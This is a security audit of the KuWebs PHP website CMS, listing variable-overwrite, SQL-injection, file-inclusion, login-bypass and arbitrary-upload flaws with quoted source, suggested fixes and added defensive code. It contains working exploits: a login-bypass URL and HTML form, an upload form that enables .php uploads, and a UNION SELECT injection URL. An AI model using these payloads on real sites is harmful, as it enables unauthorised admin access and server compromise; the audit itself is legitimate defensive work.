Introduction:
The Cool Weft (KuWebs) enterprise website management system is a marketing website system developed by Cool Weft Information (www.kuwebs.com) as a packaged solution for enterprise websites. The backend uses a PHP + MySQL architecture with built-in modules for the company profile, news, products, images, downloads, online messages, FAQ and links. The front end uses DIV + CSS and follows SEO conventions, providing professional marketing websites for enterprises through templates or customization.
0.19 million...
Recommended code audit tool: Seay PHP code audit tool, 2012 final version: http://www.bkjia.com/soft/201211/35390.html
Author: Seay
Blog: http://www.cnseay.com/
Download this article and the EXP:
http://www.cnseay.com/wp-content/uploads/2012/12/kuwebscode audit report leakage packing and repair .rar
Vulnerability list:
1. Variable overwrite vulnerability
2. Message board blind injection
3. Online application blind injection
4. getIP() function injection
5. File inclusion vulnerability
6. Variable overwrite, injection and other methods to bypass backend login
7. Arbitrary file upload vulnerability
8. Online feedback injection vulnerability
Endless injections...
Arbitrary file deletion...
Arbitrary file download...
Endless...
1. Variable overwrite vulnerability
Look at the home page index.php; it starts with inc/common.inc.php.
<?php
require_once 'inc/common.inc.php'; // load the system's public functions and the front-end configuration file
if (2 == $kuWebsiteHTMLStartType)
{
    //echo $kuHttpPath . 'index_' . $kuWebsiteDefauleIndexLanguage . $kuWebsiteTempHTMLType;
    $content = @file_get_contents($kuHttpPath . 'index_' . $lang . transferHTMLType($kuWebsiteHTMLType));
    if (!empty($content))
    {
        echo $content;
        exit;
    }
}
In inc/common.inc.php and admin/inc/common.inc.php we see the classic piece of variable-overwrite code:
$_POST = filterChar($_POST);
$_GET = filterChar($_GET);
$_COOKIE = filterChar($_COOKIE);
if (!ini_get('register_globals'))
{
    @extract($_COOKIE, EXTR_SKIP);
    @extract($_FILES, EXTR_SKIP);
}
foreach (array('_COOKIE', '_POST', '_GET') as $_request)
{
    foreach ($$_request as $_key => $_value)
    {
        $_key{0} != '_' && $$_key = daddslashes($_value);
    }
}
Every request key that does not start with an underscore becomes a global variable, even when a variable of that name (such as a configuration value) already exists.
Fix: do not define variables lazily. If you do not need request variables registered automatically, simply remove this code.
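As an added illustration (not KuWebs code), this stand-alone script shows how the register loop above lets a request key replace a configuration variable, beside a guarded loop that never overwrites an existing global. The request array is constructed, and addslashes() stands in for the system's daddslashes().

```php
<?php
// Added example, not from KuWebs: a request key named like a configuration
// variable replaces it under the auto-registration loop above.

// Configuration value set by common.inc.php before request variables are registered.
$configTableHead = 'kuwebs_';

// Constructed request standing in for $_GET / $_POST / $_COOKIE.
$request = ['menuid' => '5', 'configTableHead' => 'attacker_controlled_'];

// The pattern from the page: every key not starting with '_' becomes a global,
// even when that global already exists. $_key[0] replaces the $_key{0} syntax
// removed in PHP 8; addslashes() stands in for the system's daddslashes().
function registerVulnerable(array $src)
{
    foreach ($src as $_key => $_value) {
        $_key[0] != '_' && $GLOBALS[$_key] = addslashes($_value);
    }
}

// Guarded variant: skips names that already exist, are empty or start with '_'.
// This blocks the overwrite; the real fix is to drop auto-registration and read
// $_GET / $_POST explicitly wherever a value is needed.
function registerGuarded(array $src)
{
    foreach ($src as $_key => $_value) {
        if (!is_string($_key) || $_key === '' || $_key[0] === '_') {
            continue;
        }
        if (array_key_exists($_key, $GLOBALS)) {
            continue; // configuration and system variables stay untouched
        }
        $GLOBALS[$_key] = addslashes($_value);
    }
}

registerGuarded($request);
echo "guarded:    configTableHead = $configTableHead\n"; // still kuwebs_

registerVulnerable($request);
echo "vulnerable: configTableHead = $configTableHead\n"; // now attacker_controlled_
```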
2. Message board blind injection
File message/add.php:
<?php
require_once '../inc/common.inc.php';
$kuMessageBackSendUrl = $kuHttpPath . "message/index.php?lang={$kuWebsiteCurrLanguage}&menuid={$menuid}&page=1";
$strSql = "select id, menutitle from {$configTableHead}menu where fatherid = {$menuid} and lang = '{$kuWebsiteEditVersionLanguage}';";
$result = $dbInstance->query($strSql);
while ($row = $dbInstance->fetchArray($result))
{
    $secondMenuNav[] = $row;
}
$menuid is not wrapped in single quotes.
Fix: add single quotes
3. Online application blind injection
File /job/resume.php, line 40:
$arrMenuInfo = getMenuIdInfo($menuid);
$topMenuId = '';
if (count($kuMenuList[$kuProductShow['type3']])) $topMenuId = $arrMenuInfo['type3'];
else if (count($kuMenuList[$kuProductShow['type2']])) $topMenuId = $arrMenuInfo['type2'];
else if (count($kuMenuList[$kuProductShow['type1']])) $topMenuId = $arrMenuInfo['type1'];
Let's look at getMenuIdInfo($menuid), in inc/commonfunc.inc.php at line 2:
function getMenuIdInfo($id)
{
    if ('' == $id || 0 > $id) return;
    global $configTableHead, $kuWebsiteCurrLanguage, $dbInstance;
    $strSql = "select id, fatherid from {$configTableHead}menu where id = {$id};";
    $row1 = $dbInstance->getOne($strSql);
    // ... rest of the function omitted
}
We can see that $id reaches the database without single quotes, so it can be injected.
Fix: add single quotes
4. getIP() function injection
In inc/commonfunc.inc.php and admin/inc/commonfunc.inc.php:
function getIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) { $ip = getenv("HTTP_CLIENT_IP"); }
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) { $ip = getenv("HTTP_X_FORWARDED_FOR"); }
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) { $ip = getenv("REMOTE_ADDR"); }
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) { $ip = $_SERVER['REMOTE_ADDR']; }
    else { $ip = "unknown"; }
    return ($ip);
}
A common problem: this value is never filtered and GPC (magic quotes) does not apply to it, so HTTP_CLIENT_IP is under the client's control and leads to injection. The function is called only a few times in the backend; there is a call at the login, but it is of little use.
Fix: verify the IP address format
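An added example of the fix (not KuWebs code): a getIP() replacement that only returns a syntactically valid address and only honours the forwarding headers when the direct peer is a known proxy. The TRUSTED_PROXIES value and the request arrays are constructed for the demonstration.

```php
<?php
// Added example, not KuWebs code: a getIP() that validates the address and
// ignores client-supplied headers unless the request came through our own proxy.

// Addresses of proxies whose forwarding headers we trust (assumed deployment value).
const TRUSTED_PROXIES = ['10.0.0.2'];

function getClientIp(array $server): string
{
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($remote, FILTER_VALIDATE_IP) === false) {
        return 'unknown';
    }
    // HTTP_CLIENT_IP and HTTP_X_FORWARDED_FOR are set by whoever sends the
    // request, so they are only meaningful when the peer is a trusted proxy.
    if (in_array($remote, TRUSTED_PROXIES, true)) {
        foreach (['HTTP_X_FORWARDED_FOR', 'HTTP_CLIENT_IP'] as $header) {
            if (empty($server[$header])) {
                continue;
            }
            // X-Forwarded-For may carry a chain; the first entry is the client.
            $candidate = trim(explode(',', $server[$header])[0]);
            if (filter_var($candidate, FILTER_VALIDATE_IP) !== false) {
                return $candidate;
            }
        }
    }
    return $remote;
}

// Constructed requests.
$direct   = ['REMOTE_ADDR' => '203.0.113.9',
             'HTTP_CLIENT_IP' => 'not-an-address']; // header ignored: peer is not a proxy
$viaProxy = ['REMOTE_ADDR' => '10.0.0.2',
             'HTTP_X_FORWARDED_FOR' => '198.51.100.7, 10.0.0.2'];
$badProxy = ['REMOTE_ADDR' => '10.0.0.2',
             'HTTP_X_FORWARDED_FOR' => 'garbage value'];

echo getClientIp($direct), "\n";   // 203.0.113.9
echo getClientIp($viaProxy), "\n"; // 198.51.100.7
echo getClientIp($badProxy), "\n"; // 10.0.0.2 (invalid header value discarded)
```

Whatever the function returns should still be written to the database with a bound parameter rather than interpolated into the update statement.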
5. File inclusion vulnerability
In admin/index.php:
<?php
session_start(); // enable the session
require_once('inc/common.inc.php');
if (!empty($menu) && !empty($path)) // check the entry parameters
{
    if ('php' == fileExt($menu)) // check whether menu is a php file
    {
        include_once($path . '/' . $menu);
    }
    else
    {
        include_once($path . '/' . $menu . '.inc.php');
    }
    exit;
}
include_once('inc/logincheck.php'); // load the administrator login module
include_once('template/' . $adminTemplateName . '/index.html'); // static page with the configured suffix index.html
?>
As soon as the parameters are received the file is included; the login check only comes afterwards. Combined with the variable overwrite above, $menu and $path are both controllable and are included directly.
Fix: do not include files like this
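An added example of a safer layout for admin/index.php (not KuWebs code): the $path/$menu pair is restricted to plain names, resolved with realpath(), and required to stay inside the admin module directory, and the include only happens after authentication. The module tree is constructed in a temporary directory, and isLoggedIn() is a hypothetical stand-in for inc/logincheck.php.

```php
<?php
// Added example, not KuWebs code: resolve $path/$menu to a module file that
// must lie inside the admin directory; only the ".inc.php" module form is handled.

function resolveModule(string $baseDir, string $path, string $menu): ?string
{
    // Plain names only: no separators and no dots, so no traversal or extension games.
    if (!preg_match('/^[A-Za-z0-9_]+$/', $path) || !preg_match('/^[A-Za-z0-9_]+$/', $menu)) {
        return null;
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . '/' . $path . '/' . $menu . '.inc.php');
    // realpath() resolves symlinks and ".."; the result must still sit under $base.
    if ($base === false || $file === false
        || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

// Constructed module tree in a temporary directory for the demonstration.
$root = sys_get_temp_dir() . '/kuwebs_demo_' . getmypid();
mkdir($root . '/admin/login', 0700, true);
file_put_contents($root . '/admin/login/login.inc.php', "<?php echo 'login module';\n");
file_put_contents($root . '/outside.inc.php', "<?php echo 'outside admin';\n");

$cases = [
    ['login', 'login'],        // legitimate module => ok
    ['..', 'outside'],         // traversal, rejected by the name pattern
    ['login', 'nonexistent'],  // no such module, realpath() fails
    ['login', 'login.inc'],    // dots are not allowed in names
];
foreach ($cases as [$path, $menu]) {
    $file = resolveModule($root . '/admin', $path, $menu);
    printf("%-18s => %s\n", "$path/$menu", $file === null ? 'REJECTED' : 'ok');
}

// In admin/index.php the order would be: authenticate first, then include.
// isLoggedIn() is hypothetical and stands in for inc/logincheck.php.
//   if (!isLoggedIn()) { promptMessage(...); exit; }
//   $file = resolveModule(__DIR__, $path, $menu);
//   if ($file === null) { exit; }
//   include_once $file;

// Remove the constructed tree.
unlink($root . '/admin/login/login.inc.php');
unlink($root . '/outside.inc.php');
rmdir($root . '/admin/login'); rmdir($root . '/admin'); rmdir($root);
```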
6. Variable overwrite, injection and other methods to bypass backend login
Login bypass 1:
Let's look at admin/inc/logincheck.php, the file that verifies the login.
<?php
session_start();
require_once('common.inc.php');
$adminId = $_SESSION['adminid'];
$adminUser = $_SESSION['adminuser'];
$adminPassword = $_SESSION['adminpassword'];
$strSql = "select id, adminuser, adminpassword from {$configTableHead}admin where adminuser = '{$adminUser}' and adminpassword = '{$adminPassword}';";
$row = $dbInstance->getOne($strSql);
if (1 > $row['id'])
{
    promptMessage("index.php?lang={$kuWebsiteEditVersionLanguage}&path=login&menu=login", $promptNonLogin, $configJumpTime);
    exit;
}
?>
The $configTableHead variable can be overwritten, so we can overwrite it and inject directly.
EXP:
http://www.cnseay.com/admin1/left.php?lang=cn&configTableHead=kuwebs_admin limit 1%23seay
Login bypass 2:
Let's look at the login file admin/login/login_action.inc.php; the $configTableHead variable is used at line 104.
else if ("" == $action)
{
    $userName = trim($_POST['username']);
    $password = $_POST['pass'];
    $checkCode = trim($_POST['checkcode']);
    if (empty($checkCode) || $_SESSION["code"] != $checkCode)
    {
        promptMessage("index.php?lang={$kuWebsiteEditVersionLanguage}&path=login&menu=login", $promptEmptyCheckCode, $configJumpTime, $adminHttpImgPath, $kuLanguage);
        exit;
    }
    if (1 > strlen($userName) || 1 > strlen($password))
    {
        promptMessage("index.php?lang={$kuWebsiteEditVersionLanguage}&path=login&menu=login", $promptEmptyLogin, $configJumpTime);
        exit;
    }
    $userPassword = CommTool::encryptMd5($password, $configEncryptTimes);
    $strSql = "select id, adminuser, adminpassword from {$configTableHead}admin where adminuser = '$userName' and adminpassword = '$userPassword';";
    $row = $dbInstance->getOne($strSql);
    if (1 > $row['id'])
    {
        promptMessage("index.php?lang={$kuWebsiteEditVersionLanguage}&path=login&menu=login", $promptLoginFail, $configJumpTime);
        exit;
    }
    else
    {
        $_SESSION['adminid'] = $row['id'];
        $_SESSION['adminuser'] = $row['adminuser'];
        $_SESSION['adminpassword'] = $row['adminpassword'];
        if ($configIsLog) CommTool::writeLog("");
        if ($configIsLog) CommTool::writeLog("{$_SESSION['adminuser']} login to system");
        $adminmodifyip = getIP();
        $strSql = "update {$configTableHead}admin set regtime = '{$nowTime}', adminmodifyip = '{$adminmodifyip}' where id = {$_SESSION['adminid']}";
        if ($dbInstance->query($strSql))
        {
            promptMessage($adminHttpPath . 'index.php', $promptLoginSuccess, $configJumpTime);
            exit;
        }
        else
        {
            $_SESSION['adminid'] = '';
            $_SESSION['adminuser'] = '';
            $_SESSION['adminpassword'] = '';
            promptMessage("index.php?lang={$kuWebsiteEditVersionLanguage}&path=login&menu=login", $promptLoginUpdateFail, $configJumpTime);
            exit;
        }
    }
}
Obviously we can overwrite $configTableHead as above and inject again to bypass the login.
What is annoying is the part that follows:
        $strSql = "update {$configTableHead}admin set regtime = '{$nowTime}', adminmodifyip = '{$adminmodifyip}' where id = {$_SESSION['adminid']}";
        if ($dbInstance->query($strSql))
        {
            promptMessage($adminHttpPath . 'index.php', $promptLoginSuccess, $configJumpTime);
            exit;
        }
        else
        {
            $_SESSION['adminid'] = '';
            $_SESSION['adminuser'] = '';
            $_SESSION['adminpassword'] = '';
This records the administrator login. It does not combine with the injection above: the overwritten table prefix makes the update query fail, the session is reset, and the login is gone as soon as it is made.
But let's look a bit further up, starting from line 1:
else if ("relogin" == $action)
{
    $oldAdminUser = $_SESSION['adminuser'];
    $_SESSION['adminid'] = "";
    $_SESSION['adminuser'] = "";
    $_SESSION['adminpassword'] = "";
    $userName = trim($_POST['username']);
    $password = $_POST['pass'];
    if ($configIsLog) CommTool::writeLog("$oldAdminUser Exit. Change into $userName to login");
    if (1 > strlen($userName) || 1 > strlen($password))
    {
        promptMessage("index.php?lang={$kuWebsiteEditVersionLanguage}&path=login&menu=login", $promptNonLogin, $configJumpTime);
        exit;
    }
    $userPassword = CommTool::encryptMd5($password, $configEncryptTimes);
    $strSql = "select id, adminuser, adminpassword from {$configTableHead}admin where adminuser = '$userName' and adminpassword = '$userPassword';";
    $row = $dbInstance->getOne($strSql);
    if (1 > $row['id'])
    {
        if ($configIsLog) CommTool::writeLog("{$_SESSION['adminuser']} login to system failed");
        promptMessage("index.php?lang={$kuWebsiteEditVersionLanguage}&path=login&menu=login", $promptLoginFail, $configJumpTime);
        exit;
    }
    else
    {
        $_SESSION['adminid'] = $row['id'];
        $_SESSION['adminuser'] = $row['adminuser'];
        $_SESSION['adminpassword'] = $row['adminpassword'];
        if ($configIsLog) CommTool::writeLog("{$_SESSION['adminuser']} login to system Success");
        promptMessage("index.php", $promptLoginSuccess, $configJumpTime);
        exit;
    }
}
Obviously the session is not reset here, so we can overwrite the $configTableHead variable to inject and bypass the login.
EXP:
<html>
<head>
<title>www.cnseay.com</title>
</head>
<body>
<form name="form1" method="post" action="http://www.cnseay.com/admin1/index.php?lang=cn&path=login&menu=login_action&action=relogin">
<input name="username" type="hidden" value="admin"/>
<input name="pass" type="hidden" value="admin"/>
<input name="configTableHead" type="hidden" value="kuwebs_admin limit 1 #1"/>
<input type="submit" value="login">
</form>
</body>
</html>
Change www.cnseay.com/admin1 to the backend address of the site and click login.
Of course, there are more bypass methods than these, such as overwriting the database connection string.
Fix: needless to say...
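An added example of how the login could be written instead (not KuWebs code): the table prefix is a constant that auto-registration cannot replace, the user name is a bound parameter, the password is checked with password_verify(), and the session holds only the admin id rather than the user name and password hash that logincheck.php re-queries on every request. It uses an in-memory SQLite database (PDO with the pdo_sqlite extension) and a constructed admin row so it runs stand-alone.

```php
<?php
// Added example, not KuWebs code: a login with bound parameters, a fixed table
// prefix, password hashing and a minimal session.

const TABLE_HEAD = 'kuwebs_'; // a constant cannot be overwritten by a request variable

function adminLogin(PDO $db, string $user, string $pass): ?int
{
    $stmt = $db->prepare('SELECT id, adminpassword FROM ' . TABLE_HEAD . 'admin WHERE adminuser = :u');
    $stmt->execute([':u' => $user]); // user-supplied value is bound, never interpolated
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // Compare against a real password hash; an unknown user and a wrong
    // password take the same path.
    if ($row === false || !password_verify($pass, $row['adminpassword'])) {
        return null;
    }
    return (int) $row['id'];
}

function establishSession(array &$session, int $adminId): void
{
    // Only the id is stored; later requests look the account up by id.
    $session = ['adminid' => $adminId];
    // In a real request, also call session_regenerate_id(true) here.
}

// Constructed database and admin row.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE ' . TABLE_HEAD . 'admin (id INTEGER PRIMARY KEY, adminuser TEXT, adminpassword TEXT)');
$db->prepare('INSERT INTO ' . TABLE_HEAD . 'admin (adminuser, adminpassword) VALUES (?, ?)')
   ->execute(['admin', password_hash('correct horse', PASSWORD_DEFAULT)]);

$session = [];
var_dump(adminLogin($db, 'admin', 'wrong'));          // NULL
var_dump(adminLogin($db, "o'brien", 'correct horse')); // NULL: quote is harmless when bound
$id = adminLogin($db, 'admin', 'correct horse');       // 1
if ($id !== null) {
    establishSession($session, $id);
}
print_r($session); // Array ( [adminid] => 1 )
```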
7. Arbitrary file upload vulnerability
Almost every system with this kind of variable overwrite also has an arbitrary file upload.
Look at admin/uploadfilesave.php, which does have a login-permission check, and then at line 72:
$downloadurl = upload('imgurl', $kuWebsiteAllowUploadFileFormat);
Look at the upload function:
function upload($form, $fileFormat)
{
    global $promptIncludeDirUploadFileCanNotWrite, $promptIncludeDirCorrectUploadFileFormat, $promptIncludeDirCopyUploadFileError;
    if (is_array($form))
    {
        $filear = $form;
    }
    else
    {
        $filear = $_FILES[$form];
    }
    // ... omitted ...
    if ($fileFormat != "" && !in_array(strtolower($ext), explode("|", strtolower($fileFormat))))
The allowed-format list comes from the $kuWebsiteAllowUploadFileFormat variable, so we only need to overwrite that variable to upload any file.
The EXP directly:
<form name="form1" enctype="multipart/form-data" method="post" action="http://www.cnseay.com/admin/include/uploadfilesave.php?action=add">
<input type="file" name="imgurl">
<input type="hidden" name="kuWebsiteAllowUploadFileFormat" value="php|asp|aspx">
<input type="submit" name="Submit" value="">
</form>
Fix: needless to say...
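An added example of the hardened check (not KuWebs code): the allowed-extension list is a constant in code rather than a variable, the extension is taken from the last dot of the original name and matched case-insensitively, and the stored file name is generated server-side so the client never chooses the name or the extension. The whitelist and the $_FILES entries are constructed.

```php
<?php
// Added example, not KuWebs code: upload validation that cannot be changed by
// a request parameter and never stores the client-supplied file name.

const ALLOWED_UPLOAD_EXT = ['jpg', 'jpeg', 'png', 'gif', 'zip', 'pdf']; // assumed list

function checkUpload(array $file, array $allowed = ALLOWED_UPLOAD_EXT): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return null;
    }
    // Extension after the final dot only; "x.php.jpg" yields "jpg" and the
    // original name is discarded, so nothing ending in .php reaches disk.
    $ext = strtolower(pathinfo($file['name'] ?? '', PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, $allowed, true)) {
        return null;
    }
    // Server-chosen name: random, with the validated extension appended.
    return bin2hex(random_bytes(8)) . '.' . $ext;
}

// Constructed $_FILES entries.
$cases = [
    ['name' => 'photo.JPG',    'error' => UPLOAD_ERR_OK],       // stored
    ['name' => 'report.pdf',   'error' => UPLOAD_ERR_OK],       // stored
    ['name' => 'page.php',     'error' => UPLOAD_ERR_OK],       // rejected
    ['name' => 'image.jpg.php','error' => UPLOAD_ERR_OK],       // rejected: last extension wins
    ['name' => 'noext',        'error' => UPLOAD_ERR_OK],       // rejected
    ['name' => 'big.png',      'error' => UPLOAD_ERR_INI_SIZE], // rejected: upload error
];
foreach ($cases as $case) {
    $stored = checkUpload($case);
    printf("%-16s => %s\n", $case['name'], $stored === null ? 'REJECTED' : "stored as $stored");
}
// A request field named kuWebsiteAllowUploadFileFormat has no effect here:
// the list is a constant, not a variable that auto-registration can replace.
```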
8. Online feedback injection vulnerability
See plus/feedback.php, line 105:
$strSql = "select * from {$configTableHead}{$fType} where id = {$objectid}";
No single quotes.
Test:
http://localhost/kuwebs/plus/feedback.php?feedbacktype=1&objectid=1 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
Endless injections:
There are many injections like this, for example in admin/menu/menu_modify.inc.php:
$strFather = "select * from {$configTableHead}menu where id = {$fatherId};";
I won't list them one by one.
Fix: single quotes...
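An added example covering the integer-id queries in sections 2, 3 and 8 (not KuWebs code): the id is validated as an integer and bound, and the {$fType} table name, which cannot be a bound parameter, is mapped through a fixed whitelist instead of being interpolated. It uses an in-memory SQLite database (PDO with pdo_sqlite), and the table prefix, whitelist and rows are constructed.

```php
<?php
// Added example, not KuWebs code: integer ids are validated and bound; the
// feedback type selects a table through a whitelist, never by interpolation.

const TABLE_HEAD = 'kuwebs_';
const FEEDBACK_TABLES = ['news' => 'news', 'product' => 'product']; // assumed type -> table map

function getMenuIdInfoSafe(PDO $db, $id): ?array
{
    // Reject anything that is not a positive integer before it goes near SQL.
    $id = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, fatherid FROM ' . TABLE_HEAD . 'menu WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function getFeedbackObject(PDO $db, string $fType, $objectId): ?array
{
    if (!array_key_exists($fType, FEEDBACK_TABLES)) {
        return null; // unknown type: the raw value never reaches the query
    }
    $objectId = filter_var($objectId, FILTER_VALIDATE_INT);
    if ($objectId === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT * FROM ' . TABLE_HEAD . FEEDBACK_TABLES[$fType] . ' WHERE id = :id');
    $stmt->execute([':id' => $objectId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed database and rows.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE ' . TABLE_HEAD . 'menu (id INTEGER PRIMARY KEY, fatherid INTEGER)');
$db->exec('INSERT INTO ' . TABLE_HEAD . 'menu VALUES (7, 2)');
$db->exec('CREATE TABLE ' . TABLE_HEAD . 'news (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO " . TABLE_HEAD . "news VALUES (1, 'hello')");

var_dump(getMenuIdInfoSafe($db, '7'));         // array(id => 7, fatherid => 2)
var_dump(getMenuIdInfoSafe($db, '7 and 1=2')); // NULL: not an integer
var_dump(getFeedbackObject($db, 'news', 1));   // array(id => 1, title => hello)
var_dump(getFeedbackObject($db, 'admin', 1));  // NULL: not a whitelisted type
```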
Variable overwrite is a big problem and easily leads to secondary exploitation vulnerabilities; the arbitrary file deletion mentioned above and the rest can be seen with a quick black-box look at the backend.
That is as far as I have looked for now. There are too many problems; the rest can wait for later.